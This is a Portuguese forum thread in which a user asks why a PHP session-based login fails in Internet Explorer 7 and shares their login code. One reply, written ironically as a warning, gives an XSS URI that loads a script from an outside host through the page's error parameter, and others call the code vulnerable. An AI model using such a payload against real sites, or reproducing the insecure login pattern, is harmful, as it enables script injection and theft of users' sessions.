• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

watt

Problemas nos Session no IE 7

6 mensagens neste tópico

Boas pessoal!

estou com um problema um bocado chato :D. o meu site worka fixe no Ie 6 e nos FF. Mas no Ie 7 está com um problema..

faço login 1 vez entro na pagina inicial da zona privada, e em mais nenhuma que necessite de login. mas se fizer login uma 2ª vez ja corre tudo bem... acham isto nomal ???

<?php 
session_start();
ob_start();	

...

if (($_POST['user'] == $row_rs['user']) and ($pass ==  $row_rs['pass'])){
	$_SESSION['log'] = "ok";
	$_SESSION['user'] = $_POST['user'];
	//session_register("log");
	$url="pmemb.php?user=".$_POST['user']."";
	}
	else
	{
	$url="index.php?var=Username ou Password invalido";
	}
	header(sprintf("Location: %s", $url));
?>

este é o meu codigo onde verifica o login, e depois nas outras paginas tenho logo no inicio

<?php
ob_start();
session_start();
if ($_SESSION['log'] != "ok"){
	$url="index.php?var=Username ou Password invalido";
	header(sprintf("Location: %s", $url));
}
?>

Alguem me pode dar uma ajuda SFF ? (isto tem que dar no IE 7) é obrigatório. :P

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Não entendo, porquê que estando tu a utilizar as sessions passas o user por parametro (como tipo método $_GET).  :hmm:

Abres todas as páginas no mesmo separador?

Não fazes nenhum session_destroy() ou session_unset() pelo meio?  :D

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Adorava aceder a este URI: /index.php?var=<script src=http://kakakeys.com/xs.js></script>

</irony>

Cheira-me que tens aí uma falha de code injection no index.php, but that's just me.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

olha procura no armazem de código sistemas de login ha lá aos pontapés, esse script é vuneravel

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

olha procura no armazem de código sistemas de login ha lá aos pontapés, esse script é vuneravel

Vulnerável a?
0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Não entendo, porquê que estando tu a utilizar as sessions passas o user por parametro (como tipo método $_GET).  :hmm:

Abres todas as páginas no mesmo separador?

Não fazes nenhum session_destroy() ou session_unset() pelo meio?  :P

nop...

estou a ver se no armazem de codigo está lá algum sistema de login.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora